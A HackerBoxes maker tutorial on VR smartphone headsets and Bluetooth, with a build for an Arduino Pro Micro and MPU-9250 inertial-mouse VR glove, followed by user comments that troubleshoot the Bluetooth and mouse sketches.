Linux vsock wpan-tap - IEEE 802.15.4 Wireless with TAP pseudo-header x2e-serial - X2E serial line capture x2e-xoraya - X2E Xoraya x25-nettl - X.25 with nettl headers xeth - Xerox 3MB Ethernet zwave-serial - Z-Wave Serial API packets Mergecap is a program that combines multiple saved capture files into a single output file specified by the -w argument. Mergecap, Mergecap writes all of the packets in the input capture files to a pcapng file. The -F flag can be used to specify the capture file’s output format ;). For more information on mergecap consult your local manual page ( man mergecap) or the online version. Help information available from mergecap. Mergecap (Wireshark) 3.5.0 (v3.5.0rc0-461-g969c1c0271bf). -V print version information and exit. There on the command line. If not, the first packet is timestamped with the current time the conversion takes place. Multiple packets are written with timestamps differing by one microsecond.5.0 (v3.5.0rc0-461-g969c1c0271bf) used when generating dummy headers. The indication is only stored if the output format is pcapng. 262144 -n use pcapng instead of pcap as output format. -N <intf-name> assign name to the interface in the pcapng> prepend dummy IPv6 header with specified dest and source address. Example: -6 fe80::202:b3ff:fe1e:8329,2001:0db8:85a3:. -v print version information and exit. -d show detailed debug of parser states. -q generate no output at all (automatically disables -d). reordercap lets you reorder a capture file according to the packets timestamp. For more information on reordercap consult your local manual page ( man reordercap) or the online version. Help information available from reordercap. Reordercap (Wireshark) 3.5.0 (v3.5.0rc0-461-g969c1c0271bf) Reorder timestamps of input file frames into output file. See for more information. Usage: reordercap [options] <infile> <outfile> Options: -n don't write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit. As with the original license and documentation distributed with Wireshark, this document is covered by the GNU General Public License (GNU GPL). If you haven’t read the GPL before, please do so. It explains all the things that you are allowed to do with this code and.
http://wireshark.marwan.ma/docs/wsug_html/
CC-MAIN-2021-39
refinedweb
35,420
56.05
A title bar control used in windows derived from StelDialog. More... #include <Dialog.hpp> A title bar control used in windows derived from StelDialog. As window classes derived from StelDialog are basic QWidgets, they have no title bar. A BarFrame control needs to be used in each window's design to allow the user to move them. Typically, the frame should contain a centered label displaying the window's title and a button for closing the window (connected to the StelDialog::close() slot). To use the default Stellarium style for title bars, the BarFrame object of a given window should be named "TitleBar". See the normalStyle.css file for the style sheet description. Definition at line 42 of file Dialog.hpp.
http://stellarium.org/doc/0.12.4/classBarFrame.html
CC-MAIN-2014-52
refinedweb
121
58.48
CodeGuru Forums > Visual C++ & C++ Programming > C++ (Non Visual C++ Issues) > C++ Replacing HTML Character Entities PDA Click to See Complete Forum and Search --> : C++ Replacing HTML Character Entities jmhobbs March 18th, 2008, 06:20 PM Hello, this is my first post on this forum, hope it works out :) I'm trying to do HTML entity decoding in C++, couldn't find any existing text out there to help out. Hows this look? It works on a small scale, but with lots of text it tends to stumble, even lock some times. Any ideas on performance here, or what I might be doing wrong? Thanks in advance! string htmlEntitiesDecode (string str) { string subs[] = { """, """, "'", "'", "&", "&", "<", "<", ">", ">" }; string reps[] = { "\"", "\"", "'", "'", "&", "&", "<", "<", ">", ">" }; size_t found; for(int j = 0; j <= 10; j++) { do { found = str.rfind(subs[j]); if (found != string::npos) str.replace (found,subs[j].length(),reps[j]); } while (found != string::npos); } return str; } 7stud March 18th, 2008, 11:24 PM 1)Here is what a string looks like in C++: "hello" Note how there are two quotation marks and only two quotation marks. One marks the beginning of the string and the other marks the end of the string. Now look at your subs array. Do all the strings in the subs array have two quote marks: one marking the beginning and the other marking the end? The syntax colors in your C++ editor should have alerted you to the problem. 2) If you replace a quote mark with a quote mark, will your do-while loop ever terminate? potatoCode March 18th, 2008, 11:44 PM Hello jmhobbs, this is a good practice, good for you! I think I see some problems here. 1. like 7stud had pointed out your first string in the first array of string is in error. (do it like you did in the 2nd array). 2. string::rfind returns the pos of the last occurrence. Your do-while loop exits on contingent to string::npos in side the For loop. Think what would happen if there was only one match. your inner loop will not be iterated because the condition in the do/while will be always true. This is why sometimes it hangs(if not npos) and sometimes it works(if npos). And as for the scale issue, you can pass str by reference(no copying) instead of value. hope this helps :) 7stud March 19th, 2008, 12:03 AM 3) If there are 10 elements in an array, the index positions of the elements are numbered 0-9. So, your loop should terminate when j=10, i.e. when j=10, the loop should not execute. 4) Your subs and reps arrays need to be reworked. Half the elements in the subs array are being replaced by themselves, i.e. if you did nothing the result would be the same. Substituting a string with itself is a complete waste of time. 5) rfind? What's the matter with find()? My advice: start with one string in your subs array and one string in your reps array. Get your program working for that one string. Then add other strings one by one to the subs and reps arrays. dave2k March 19th, 2008, 10:09 AM there are probably a million ways to do this, but i would do somethng like this:#include <boost/algorithm/string/replace.hpp> #include <hash_map> #include <string> using namespace boost::algorithm; typedef std::hash_map<std::string, std::string> StrStrMap; void htmlEntitiesDecode(std::string& s) { StrStrMap m; m["&"] = "&"; //m["\""] = """; m["'"] = "'"; m["<"] = "<"; m[">"] = "&rt;"; StrStrMap::const_iterator i = m.begin(); for (i; i != m.end(); ++i) { replace_all(s, i->second, i->first); } } int main(int argc, char* argv[]) { std::string s = "gsdf"gsdfg&&fgg"; htmlEntitiesDecode(s); return 0; } I used a hash map here because the order i inserted the elements is important, i.e. you want to search for apersands first. Also notice that i commented out the " search. This was screwing up the string, but i am not entirely sure why. This is a html-parser: jmhobbs March 19th, 2008, 11:17 AM First off thanks to everyone who replied! To deal with the items raised... 7stud: 1, 2, 4 The subs array actually looks like this (minus the spaces in the numeric escape codes): string subs[] = { "& #34;", """, "& #39;", "'", "& #38;", "&", "& #60;", "<", "& #62;", ">" }; It seems that in code blocks your forum leaves escape entities like "& quot;" alone but numeric "& #34;" codes it transforms. 7stud: 5 I grabbed some of the string manipulation code from something I did a long while back and didn't notice it was rfind. 7stud: 3 Oops. :) potatoCode: 2 I'm not sure I understand what you are saying there. The inner loop should terminate when there are no matches for that particular key (from the subs array, guided by the outer loop). Am I missing something there, I just don't see a problem. Thanks again for all your help, and that's a neat solution dave2k, I've never worked with the boost libraries before. potatoCode March 19th, 2008, 03:34 PM Hello jmhobbs, You are correct. I was wrong. Sorry if it made you confused. :) jmhobbs March 19th, 2008, 03:50 PM Thanks for your comments anyways :-) As a follow up, it seems to all be working fine now, here's my final code, with the spaces for the numeric entities. I had to add some numeric entities without the # sign because my source data has a bunch of those in it, I have no idea why. I guess people just do stupid things some times. string htmlEntitiesDecode (string str) { string subs[] = { "& #34;", """, "& #39;", "'", "& #38;", "&", "& #60;", "<", "& #62;", ">", "&34;", "&39;", "&38;", "&60;", "&62;" }; string reps[] = { "\"", "\"", "'", "'", "&", "&", "<", "<", ">", ">", "\"", "'", "&", "<", ">" }; size_t found; for(int j = 0; j < 15; j++) { do { found = str.find(subs[j]); if (found != string::npos) str.replace (found,subs[j].length(),reps[j]); } while (found != string::npos); } return str; } Thanks again to all those who commented! codeguru.com
http://forums.codeguru.com/archive/index.php/t-448809.html
crawl-003
refinedweb
985
73.37
0watch¶ Maintainer: Bastian Eicher License: GNU Lesser General Public License Source: Zero Install feed: 0watch scans websites for new releases using arbitrary Python code snippets. When new releases are detected 0template is used to create/update a Zero Install feed. To make the 0watch command available on your command-line you can run: 0install add 0watch To use 0watch you need both a template file named like MyApp.xml.template and watch file named like MyApp.watch.py in the same directory. You can then run: 0watch MyApp.watch.py Details¶ A watch file is a Python script that pulls a list of releases from a website. It must set an attribute named releases to an array of dictionaries. Each array element represents to a single release and each dictionary tuple is a variable substitution for the template. A basic watch file could look like this: from urllib import request import json data = request.urlopen(request.Request(' releases = [{'version': release['tag_name'], 'released': release['published_at'][0:10]} for release in json.loads(data)] For each release reported by the watch file 0watch attempts to determine whether the version is already known. It does this by: - checking if a file named MyApp-VERSION.xmlexists in the same directory and - checking if a file named MyApp.xmlexists in the same directory and contains an implementation with the version. 0watch then calls 0template once for each new release.
https://docs.0install.net/tools/0watch/
CC-MAIN-2022-21
refinedweb
234
57.87
Hi, I am working on an exercise in operator overloading. I've created a matrix class and I am supposed to overload operators so I can do arithmetic on matrices efficiently. My directions say that I am supposed to make two matrix arrays using the class constructor that has 2 parameters and a third matrix array that will be used to store the result of arithmetic using the default constructor (1 parameter). Since I am going to use these arrays to overload operators they are going to need to be data members of the class (I think). However, I thought that classes were supposed to be as representative of real life things as possible so making a matrix class with multiple arrays doesn't make sense to me (a matrix is only one matrix). Am I misunderstanding classes or is there a different way to make additional matrices using the class constructor I am not thinking of? Thanks all, here is the code in question. #include <iostream> #include <iomanip> #include <ctime> #include <cstdlib> #include <cmath> using namespace std; class matrix { friend ostream& operator << (ostream&, const matrix&); private: int size; int array[10][10]; public: matrix(int); matrix(int, int); }; int main() { int sizeIn, rangeIn; cout << "What size matrix would you like to generate?" << endl; cin >> sizeIn; cout << "What is the highest value you would like to allow a number in the matrix to be?" << endl; cin >> rangeIn; matrix arrayPrint(sizeIn, rangeIn); srand (static_cast<int>(time(NULL))); cout << arrayPrint << endl; return 0; } matrix:: matrix (int sizeIn) { int MAX_SIZE = 10; if (0 > sizeIn && sizeIn > 10) { size = MAX_SIZE; } else { size = sizeIn; } for (int i = 0; i < size; i++) for (int j = 0; j < size; j++) array[i][j] = 0; } matrix:: matrix (int sizeIn, int rangeIn) { int range; int MAX_SIZE = 10; int MAX_RANGE = 20; if (0 > sizeIn && sizeIn > 10) { size = MAX_SIZE; } else { size = sizeIn; } if (0 > rangeIn && rangeIn > 20) { range = MAX_RANGE; } else { range = rangeIn; } for (int i = 0; i < size; i++) for (int j = 0; j < size; j++) array[i][j] = (rand() % (2 * range + 1) - range); } ostream & operator << (ostream & os, const matrix & arrayPrint) { for (int i = 0; i < arrayPrint.size; i++) { cout << '|'; for (int j = 0; j < arrayPrint.size; j++) { os << setw(4) << arrayPrint.array[i][j] << " "; } os << setw(2) << '|' << endl; } return os; }
https://www.daniweb.com/programming/software-development/threads/363404/how-would-i-create-multiple-arrays-using-a-class-constructor-without-creating-more-th
CC-MAIN-2017-09
refinedweb
379
60.48
To serve people from any culture who use any language, most web applications nowadays have localization support. Localization is a process that translates content for a specific culture. It can be used to serve a multilingual, worldwide audience and achieve better market reach. In this blog, we are going to learn about how to use localization in an ASP.NET Core web API with resource (.resx) files. Prerequisites The following are the prerequisites to integrate localization in an ASP.NET Core web API: Create an ASP.NET Core REST API application Follow these steps to create an ASP.NET Core REST API application in Visual Studio 2019: Step 1: In Visual Studio 2019 (v16.4 or higher), go to File > New, and then select Project. Step 2: Choose Create a new project. Step 3: Select the ASP.NET Core Web Application template. Step 4: Enter a Project name, and then click Create. The project template dialog will be displayed. Step 5: Select the .NET Core, ASP.NET Core 3.1, API template (highlighted in the following screenshot). Configuring start-up Step 1: Register the necessary services for the localization process in the ConfigureServices method in the Startup.cs class: AddLocalization() and Configure<RequestLocalizationOptions>(). Step 2: Add the request localization middleware in the Configure method from the Startup.cs class. Strategy for resource files Resource files contain localizable strings based on the culture and the controller. We can maintain the resource files in two ways: - Single culture resource file per controller. - Single culture resource file for all controllers. Single culture resource file per controller In this method, you need to maintain a separate resource file for each culture and each controller in any file structure (i.e. dot or path) as mentioned in this documentation. Example: If you have two controllers and support for two cultures, then you need to maintain the resource files in the structure shown in the following screenshot. Here, we have support for the US English and French languages. Single culture resource file for all controllers In this method, you should maintain a single resource file based on culture for all the controllers. To do this, you need to create an empty class with the same name as the resource file. The namespace of this empty class will be used to find the resource manager and resolve IStringLocalizer<T> abstractions. Example: Despite of the number of controllers, you should only maintain one resource file for every culture supported. Refer to the following screenshot to see this approach in practice. How to use localized values in controllers ASP.NET Core provides built-in support for IStringLocalizer and IStringLocalizer<T> abstractions. These abstractions are used to get the values based on the name of the string resource passed from the respective culture resource file (e.g., HomeController.en-US.resx). To use localized values in the controllers, you need to inject the IStringLocalizer<T> abstraction based on the resource file structure mapped as shown in the following table. Based on injecting the IStringLocalizer<T> abstraction, the string localizer will map the resource file through the value passed to the shared resource (T). This string localizer will then return the mapped value from the resource file based on the name of the string resource you have passed. Resources You can find a copy of these samples in the following GitHub locations: Conclusion In this blog, we learned about implementing localization in an ASP .NET Core web API application. This feature helps to serve multilingual people from diverse cultures. Syncfusion provides over 70 high-performance, lightweight, modular, and responsive ASP.NET Core UI controls such as DataGrid, Charts, and Scheduler, and all of them have built-in support for localization. You can use them to improve your application development. Please share your feedback on this blog in the comments section. You can also contact us through our support forum, Direct-Trac, or feedback portal. We are waiting to hear from you! can we have comman resource files for all controllers ? Hi ABHIJEET SHARMA, Yes we can have a single common resource file for all controllers per culture based. You can refer the below sample for your reference. Localization Sample: Regards, Ragunaathan M P Hello. I am wondering if I can move single resource culture file to any library project? Are does need to be part of the project where Controllers are present? thanks, Hi Uma, Yes, we can maintain resource files in any library project and can refer in API project. But we need to maintain an empty class with the same name as the resource file where the namespace of this empty class will be used to find the resource manager, and resolve IStringLocalizer abstractions as explained in this blog. Regards, Ragunaathan M P can you provide an example? I am struggling to make it work. I am using the resource file on another project Hi Rashid, Kindly find the below sample which I have prepared by referring resource files from another project. Localization Sample: Regards, Ragunaathan M P Hi Raghunaathan, In the same approach can i externalize my resource files and put in CDN, so that when i add new language resource files there is no need to rebuild and deploy the application? also in that case can i load the resx file using some options like IConfiguration to map to resource manager and use it? Regards, Ravi Hi Ravi, In ASP.NET Core, localization resource files (i.e. “.resx”) will be generated with extension “.dll” based on each culture language we maintain, while building the project with “AddLocalization()” services which we add in service collection in Startup class. Hence resource manager can not be configured using “IConfiguration” and so it is better to maintain the resource files locally. However we need to deploy our application whenever we plan to release new features on regular basis and include the localization changes along with the release. Regards, Ragunaathan M P
https://www.syncfusion.com/blogs/post/how-to-use-localization-in-an-asp-net-core-web-api.aspx
CC-MAIN-2021-39
refinedweb
990
65.83
HackerBoxes 0009: Virtual Worlds Introduction: HackerBoxes 0009: Virtual Worlds Virtual Worlds: This month, HackerBox Hackers are exploring Virtual Reality technology. This Instructable contains information for working with HackerBoxes #0009. If you would like to receive a box like this right to your mailbox each month, just subscribe at HackerBoxes.com and join the revolution! Topics and Learning Objectives for this HackerBox: - Understand and Define Virtual Reality (VR) - Work with VR Headsets - Experience VR Software - Explore Bluetooth Communications - Interface and Program ATmega32U4 Microcontrollers - Interface an Inertial Measurement Unit (IMU) - Implement an Inertial Mouse Control Device using an IMU - Configure the Inertial Mouse into a VR Glove - Work with the HC-05 Bluetooth Module HackerBoxes is the monthly subscription box service for DIY electronics and computer technology. We are hobbyists, makers, and experimenters. Hack the Planet! Step 1: HackerBoxes #0009: Box Contents - HackerBox #0009 Collectible Reference Card - VR Smartphone Headset - Bluetooth Gamepad Controller - USB Bluetooth Adapter CSR 4.0 - Arduino Pro Micro with ATmega32U4 - HC-05 Bluetooth Module - MPU-92/65 Inertial Motion Sensor Module - Green Prototype PCB (4x6 cm) - Pair of Waterproof Gloves - Two Micro Buttons - Two Pairs of Velcro Tabs (16x45 mm) - DuPont Jumpers 20cm F-F - HackerBoxes Decal - Exclusive DARKNET Decal Some other things that will be helpful: - Soldering Tools - Smartphone - Computer with Arduino IDE - Glue gun or epoxy Most importantly, you will need a sense of adventure, DIY spirit, and hacker curiosity. Some of these VR technologies are still fairly cutting edge and will work differently depending upon what type of computer or smartphone you are using. This type of hobby electronics isn't always easy, but when you persist and enjoy the adventure, a great deal of satisfaction may be derived from overcoming the frustration and making things work! Step 2: Welcome to Virtual Reality Virtual reality (VR), also known as immersive multimedia or computer-simulated reality, is a computer technology that replicates an environment, real or imagined, and simulates a user's physical presence and environment to allow for user interaction. Virtual realities may be displayed on either computer monitor or through a virtual reality headset (also called head-mounted display). Some simulations include additional sensory information and focus on real sound through speakers or headphones targeted towards the user. Advanced haptic systems may include tactile information, generally known as force feedback. VR may include remote communication environments which provide virtual presence of users with the concepts of telepresence and telexistence either through the use of standard input devices such as a keyboard and mouse, or through multimodal devices such as a wired glove or omnidirectional treadmills. An immersive virtual environment can be similar to the real world in order to create a lifelike experience (for example, in simulations for pilot or combat training), or it may differ significantly from reality, such as in VR games. (from Virtual Reality) Here is a nice overview entitled, "Explained: How does VR actually work?" VR was the all the rage at CES 2016. For example, the author of this TIME article reports, "I Finally Tried Virtual Reality and It Brought Me to Tears." For further (much further) details, check out this MOOC and accompanying free text book from Computer Science Professor Steven M. LaValle at UIUC. Step 3: VR Headgear for Smartphones Google Cardboard introduced the world to easily-accessible, low-cost virtual reality by leveraging smartphone technology for processing and display. A simple mobile application is launched on the smartphone and then the smartphone is simply placed into the viewer (also known as the headset). The smartphone display is split into left and right stereoscopic components. When viewed through the lenses of the headset, the two images are fused into one image with depth for three-dimensional effect. While Google Cardboard was named for the original fold-out cardboard viewers supplied by Google and others, applicable headsets are no longer limited to those made of cardboard. The nicer plastic variety, such as those seen here, work the same way, but are much more durable and comfortable to use. Install the Google Cardboard mobile application on your smartphone and give it a try. If your smartphone is running Android, some applications may be controlled by the Bluetooth Gamepad Controller. The original cardboard versions of the smartphone headsets had magnetic switches. Sadly, the nicer ones do not. In some instances, the Bluetooth Gamepad can be used for triggering inputs. There are some interesting hacks to be found for adding the button functionality such as this one using a simple magnet. Google's VR offerings will not be ending with Cardboard. Google Daydream was announced at I/O 2016. Here is the Keynote. There was a very nice presentation at Google I/O 2016 on Designing with Daydream if you are interested in some of the nuanced considerations for designing VR apps and media. Step 4: Virtual Reality Software Once you have played with the Google Cardboard App a bit, try some others... YouTube (Android and iOS) Check out "The best 360 degree and VR videos on YouTube" Within VR (formerly Vrse) (Android and iOS) Roller-Coaster (Android and iOS) Of course you can find many, many more by searching for "VR" under Apps in the Apple iOS App Store of the Google Play Store for Android. This project is quite creative and shows some interesting examples of head tracking (using Free Track), display mirroring (using Splashtop), and game controller support (using Keysticks). Step 5: Bluetooth Wireless Technology Bluetooth is a wireless technology standard for exchanging data over short distances. It uses short-wavelength UHF radio waves in the ISM band around 2.4 GHz. This presentation on Bluetooth Basics has a lot of history and details on Bluetooth technology. The Miniature Bluetooth Gamepad can be used as an input device on computers and certain tablets and smartphones. (Newer non-rooted iOS devices do not support this type of interface). The HC-05 Bluetooth Module can be easily interfaced to a microcontroller platform (such as an Arduino board) as presented later in this Instrucable. The USB Bluetooth Adapter is based on a CSR 4.0 USB interface that may be used on your PC if it did not come with Bluetooth. Note that the CSR chipset is not supported by certain OSX versions, but Mac laptops generally provide builtin Bluetooth support. Step 6: Arduino Pro Micro 5V/16MHz 7: Inertial Measurement Unit (IMU) Module The Inertial Measurement Unit (IMU) is based on a MPU-9250. The MPU-9250 is a second generation 9-axis MotionTracking device comprising a 3-Axis Gyroscope, 3-Axis Accelerometer, and a 3-Axis Magnetometer. The schematic shown here demonstrates how to wire up the Arduino Pro Micro and the MPU-9250 to create an Inertial Mouse. One mouse button is also added. This project (with video) includes an Arduino library for the MPU-9250 and also has some example code to start with for our inertial mouse: - copy the code as shown - remove (comment out) all reference to the right button - change the left button pin to pin 4 (or whichever pin you used) - change pinMode for leftbutton from OUTPUT to INPUT_PULLUP - reverse the active level for leftstate As wired here (as opposed to in the example code), the button signal is active low since it is pulled up when released and grounded when the button is pressed. if (leftstate == LOW) { //grounded when pressed Serial.print(" Left Click! "); Mouse.press(MOUSE_LEFT); } if (leftstate == HIGH) { //pulled up when not pressed Mouse.release(MOUSE_LEFT); } Step 8: Virtual Reality Glove Once you test out the Inertial Mouse, you can mount it to the Prototyping PCB (optional) or to a piece of cardboard (optional) and then use the provided velcro tabs to adhere it to the back of a glove. The "mouse button" can be affixed to a fingertip using hot glue (or epoxy) so that it can be pressed using the thumb while operating the Inertial Mouse. Step 9: HC-05 Bluetooth Module The Bluetooth Module (HC-05) can easily be used in place of the serial monitor interface. For example, get any sketch running on the Arduino that uses serial communications. Do not wire up the HC-05 Bluetooth module yet. From the start, set the data rate to 9600bps. That is the default for the HC-05 so this just makes it easier to transition later. Get the program running on the Arduino and working with the serial monitor on your computer (make sure to set the computer serial rate to 9600 as well or it will not work). Now you can disconnect the computer (or just turn the IDE and serial monitor off if you still need it for power) and wire up the HC-05. Now Bluetooth is taking the place of the serial monitor. Sync your mobile device's Bluetooth radio to the HC-05 and run an app like BlueTerm on the mobile device. This will let you type to the serial port from the mobile device just as you did from the Arduino serial monitor, but this time, you are wireless. As an advanced option, if you want to be able to leave pins 0 and 1 connected to the PC (via the USB interface), you can modify whatever sketch you are working with to use the SoftwareSerial and wire the HC-05 rx and tx lines onto two other pins. Check out this Virtual Reality Skateboard example using a Bluetooth interface. Step 10: Hack the Planet We hope you are enjoying your time working with Virtual Worlds. If you enjoyed this Instrucable and would like to have a box like this delivered right to your mailbox each month, please join us by SUBSCRIBING HERE. Please share your success in the comments below and/or on the HackerBoxes Facebook page. Certainly let us know if you have any questions or need some help with anything. Thank you for being part of the HackerBoxes adventure. Please keep your suggestions and feedback coming. HackerBoxes are YOUR boxes. Let's make something great! My quick attempt with the Google Cardboard app and my Nexus 5 leads me to believe that the Bluetooth joy pad doesn't work to "select" in the app. Though I have seen a few websites that says similar devices can be made to work. I did grab a magnet and waved it around my phone to manage selection. For those that don't know the actual Google Cardboard devices had a "switch" that was made with a magnetic trapped in the layers of cardboard. The phones magnetometer will pick up the movement. If anyone has a better way to use the Google Cardboard app and these goggles, please let me know. In addition we should list apps that can successfully be used. I did fire up Shadowrun VR using the goggles and joy pad. Did anyone get the bluetooth gamepad to work with an android phone and the cardboard app? There are a few different "hacks" for the trigger. This one is fairly elegant if it works for you: I just made my first HackerBox and I had a great time. I'm looking forward to the next one. is this something that would only work with a smartphone? I'd be more interested in a standalone vr kit I dont like the fact that the tutorials dont address the 3.3v verses 5v dilemma, Apparently you can program in 5v mode, and the output pins operate at 5 volts when using the instructions. (I checked with a voltmeter) Both the MPU-9250 and HC-05 are rated for 3.3 volt logic levels. I understand the Arduino's inputs will tolerate this variance but I think it is bad practice to infer that all devices will interoperate between 3.3v and 5v levels. I actually walked around the house plugging this thing into various computers just to see if it worked. It did. Hello, This is my first box, and I am struggling with the Bluetooth section, I have used two different Windows computers and can't communicate over serial with the device. I can pair with the HC-05, but the serial port associated with it is always "busy" it also looks like the device disconnects instantaneously. What information do you need to point me in theright direction? If you're trying to use the arduino serial monitor that may not work for the bluetooth connection. Try downloading tera term or putty to interact with the bluetooth serial port. Also make sure your arduino code is using Serial1 and not just Serial for all the Serial1.begin, Serial1.read, and Serial1.write commands. Serial through the built in usb connection, Serial1 for an addon module using the Tx/Rx pins. Thank You, I have tried Putty to the same result. I even tried controlling just the bluetooth adapter using the Blinkies sketch from and saw the same kind of port busy message. I have wired up the adapter both with and without a voltage divider on the bluetooth RX pin. I have even tried powering the bluetooth adapter off of a separate 5 V supply, I always seem to get the same response. (I even purchased a new adapter from amazon thinking I had fried the RX pin with 5V.) It's like windows doesn't know what to do with the device and stops communicating. I wondered if it was windows 10, but my windows 7 machine is the same, except I don't get ports that are clearly attached to the bluetooth adapter. Again, Thanks for the quick reply. When I was struggling with basic bluetooth communication I went with a very simple echo program so I could see the back and forth data flow. I'd recommend loading up the below code to your arduino, then connect via putty to the outgoing com port showing up in the bluetooth port details: void setup() { Serial1.begin(9600); Serial1.println("Type Something and press enter"); } void loop() { while(Serial1.available()==0) {} Serial1.println(""); Serial1.println("You wrote:"); while(Serial1.available()>0) { Serial1.write(Serial1.read()); } Serial1.println(""); } Ok sorry for your difficulties , this is probably a silly question but have ensured that your arduino IDE serial monitor is not running ? I think you are going to have have to chase your problem down through the device manager . The fact that it pairs is a good thing and means the hardware is talking just fine, so none of the voltages or hardware crap is interfering. That leaves things in the protocol realm or device enumerator / blue tooth enumerator and type , I am using the bluetooth term from the windows app store ( freebie ) , putty is good but this app specifically looks for the bluetooth device ports. Good luck post your progress Here's the completion of my inertial mouse from this month's box. I did get bluetooth communication working between the arduino and mu computer but I abandoned getting the glove to work via bluetooth and I explain why in the video. A couple things I may adjust in the future. Take a look at the BLE libraries , you will find some wonderful things like BLEmouse .move commands and so forth. Did you get it to work with those libraries? I took a cursory look, I don't think this gets around the fundamental problem....that windows doesn't see this device as a human interface device(HID). The BLE seems to just change how it communicates, it doesn't maintain an open communication channel just sends data when there's data to send. If you've had success with this I'd be very interested, but I don't think I'll pursue that with the info I've read about it so far. If you load the BLE library using the Arduino IDE , then go select Examples from the file menu , near the bottom of the list will be BLEPeripheral , when you mouse over it a drop down list will show with HID mouse over it and you will find an example called HID_joystick_mouse This example code will run if you change the board specific references ...... If you are not comfortable writing the code flag me and I'll code up an example for you when I get a little time Cheers ! There is another way to get it to work remotely without having to buy a $25+ HID Bluetooth module and without a listener program on the computer. This solution would require 2 arduino devices and 2 Bluetooth modules. The idea would have one arduino, the motion tracker, and a Bluetooth module in slave mode on the glove powered by a battery. The arduino would feed the motion tracker and button info to the bluetooth and that's it. Then connect the other Bluetooth module in master mode to another arduino plugged into the computer. We know that the Pro Micro is recognized as a human interface device by windows, so this should work fine. This module will read the input from the Bluetooth, parse the data and send mouse commands to the computer. This would turn the arduino into a Bluetooth receiver for your machine emulating a HID so you wouldn't need the little Bluetooth receiver for you computer. Extra components beyond what was in the hackerbox: - Bluetooth module - either another HC05(master or slave) or an HC06(slave only) - Arduino, probably something like the pro mini or micro - batteries. For the extra arduino you could use the pro-mini that came in box 0008 for the glove since it only needs to communicate via Bluetooth. If I were to buy another arduino specifically for this I would purchase the 3.3V arduino pro mini since that would require less weight for the batteries to supply that voltage. That voltage works fine for all the components on the glove. Note the Box 0008 came with the 5V version of that board, so you'll want a 6V or 9V battery for that one. The zipper came off my glove the first time I zipped. Love the monthly boxes. I connected the HC-05 to the Arduino. But what code do I need to make it actually recognize it? Also, is anyone else having the issue that it disconnects the Bluetooth after a few seconds? Hey all you PC challenged (i.e. Mac OS X) people out there. Has anyone had any luck getting the HC-05 to communicate with their Mac Computer? I'm using El Capitan. So far I can connect via Bluetooth and the HC-05 tty port shows up in the terminal, but I've had no luck with moving data back and forth. I also suspect that the iPhone is a lost cause. Any detailed advice would be appreciated. The data piece may be as mentioned below replace all serial in the sketch with serial1 then recompile you should start seeing data Indeed. Replacing Serial1 for Serial doest the trick! SoftwareSerial does not seem to work with the Arduino Pro Micro. Okay here's an update the sketch won't start sending data over bluetooth till you do a find and replace Serial with Serial1 . I set up a terminal to watch the bluetooth data flow and had nothing till I recompiled with the Serial1, Still if you power this circuit separately from the computer the mouse will not work but you will still see the data flowing across the serial link. I downloaded a free bluetooth terminal programmer from the app store ( WIN 10 ) to troubleshoot with. I used the default microsoft bluetooth mgr. to Pair the HC05 and then the app found and connected fine. I though I had this beat when I saw the position data flowing and the mouse cursor moving as I moved the board ..... but then I noticed if I unplugged and ran off a straight power only USB connector the mouse would no longer work , the data for the serial did still flow. This must have something to do with the way the Mouse.h lib defines the port .... Someone didn't do a very good job of really checking this code out. Oh well let you know when I figure it out. So I'm finding out not that iOS doesn't support the HC-05 bt profile. Am I mistaken? Yep that's what I see , I can pair up fine to my Razer Tablet windows 10 but my iPhone won't even discover it. Has anyone else had trouble getting the glove mouse to click? It might be the button, but I'm not sure. Has anyone had this problem to? Yeah having same issue , haven't done much to look into it yet though Mine ended up being wiring all good now I'm going to try to change the wiring from pin 4 to ground to pin 4 to pin 5. I'll set pin 5 as an output and pin 4 as an input. I'll do it tom most likely. a little primitive but it works whoo hoo!!!!!!!! thanks all for you help> cam someone please help me to find an answer to my problem, on the mouse project I built it I went to the project reference downloaded the code and edited it as stated in reference but every time I went to compile I get an error that states 'Mouse" not found. Does your Sketch include the line #include <mouse.h>"? which I see it does I don't have a lot of programing experience so I am lost I tried for two days to find an answer on the internet with no luck. thanks // Watch video here: //Connection pins provided in the diagram at the beginning of video // library provided and code based on: #include "Wire.h" #include "I2Cdev.h" #include "MPU9250.h" #include <Mouse.h> // specific I2C addresses may be passed as a parameter here // AD0 low = 0x68 (default for InvenSense evaluation board) // AD0 high = 0x69 MPU9250 accelgyro; I2Cdev I2C_M; int16_t ax, ay, az; int16_t gx, gy, gz; int16_t mx, my, mz; float Axyz[3]; int leftbutton = 4; void setup() { // join I2C bus (I2Cdev library doesn't do this automatically) Wire.begin(); Serial.begin(9600); Serial.println("Initializing I2C devices..."); accelgyro.initialize(); Serial.println("Testing device connections..."); Serial.println(accelgyro.testConnection() ? "MPU9250 connection successful" : "MPU9250 connection failed"); delay(1000); pinMode(leftbutton, INPUT_PULLUP); Mouse.begin(); } void loop() { getAccel_Data(); float pitchrad = atan(Axyz[0] / sqrt(Axyz[1] * Axyz[1] + Axyz[2] * Axyz[2])); // radians float rollrad = atan(Axyz[1] / sqrt(Axyz[0] * Axyz[0] + Axyz[2] * Axyz[2])); // radians float rolldeg = 180 * (atan(Axyz[1] / sqrt(Axyz[0] * Axyz[0] + Axyz[2] * Axyz[2]))) / PI; // degrees float pitchdeg = 180 * (atan(Axyz[0] / sqrt(Axyz[1] * Axyz[1] + Axyz[2] * Axyz[2]))) / PI; // degrees float Min = -15;//-30, -45, -15 float Max = 15;// 30, 45, 15 int mapX = map(pitchdeg, Min, Max, -6, 6); int mapY = map(rolldeg, Min, Max, -6, 6); Mouse.move(-mapX, mapY, 0); Serial.print(pitchdeg); Serial.print(","); Serial.print(rolldeg); Serial.print(" - "); int leftstate = digitalRead(leftbutton); //Serial.print(leftstate); Serial.print(rightstate); if (leftstate == Low) { Serial.print(" Left Click! "); Mouse.press(MOUSE_LEFT); } if (leftstate == High) { Mouse.release(MOUSE_LEFT); } Serial.println(); } void getAccel_Data(void) { accelgyro.getMotion9(&ax, &ay, &az, &gx, &gy, &gz, &mx, &my, &mz); Axyz[0] = ((double) ax / 256) - 1.6; Axyz[1] = ((double) ay / 256) - 2.1; Axyz[2] = (double) az / 256; } Did you unpack the zip file into your arduino libraries folder ? Using the IDE to add it to the same ? When you go to that folder mouse.h should show up there .... probably you did but worth checking the location Also ccarrella I did copy exactly your code from your message and compiled it the only error was the states for the mouse button , they should be in all CAPS as in HIGH and LOW , other than that it compiled and ran on my board. Good Luck thank you so much I will correct the high low text and try unzipping that file much appreciated ok update I have the code compileing now but here is the problem when it goes to uypload it to the board I hear it 